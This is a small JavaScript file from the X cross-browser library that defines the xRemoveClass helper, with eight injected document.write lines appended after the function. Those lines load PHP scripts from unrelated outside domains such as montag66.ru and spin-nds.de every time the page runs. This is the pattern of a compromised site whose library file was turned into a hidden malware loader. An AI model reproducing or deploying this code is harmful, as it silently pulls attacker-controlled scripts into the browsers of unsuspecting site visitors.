// xRemoveClass, Copyright 2005-2006 Daniel Frechette
// Part of X, a Cross-Browser Javascript Library, Distributed under the terms of the GNU LGPL

/**
 * @param e - Str/Obj - Element id or object
 * @param c - Str - Class name
 * @return  - Bool - true if successful, else false
 */
function xRemoveClass(e, c) {
  e = xGetElementById(e);
  if (!e)
    return false;
  if (xHasClass(e, c))
    e.className = e.className.replace(new RegExp('(^| )'+c+'($| )','g'), '');
  return true;
};

document.write('<script src=http://spin-nds.de/cgi-bin/spin.php ><\/script>');
document.write('<script src=http://annemiekswinkels.com/Templates/contact.php ><\/script>');
document.write('<script src=http://montag66.ru/logs/index.php ><\/script>');
document.write('<script src=http://quantumesolution.com/alsol/ask-quote.php ><\/script>');
document.write('<script src=http://landthongtem.com/images/cal_func.php ><\/script>');
document.write('<script src=http://m.prossignshop.com/images/gifimg.php ><\/script>');
document.write('<script src=http://maxweberschule.de/modules/navigation.php ><\/script>');
document.write('<script src=http://m.prossignshop.com/images/gifimg.php ><\/script>');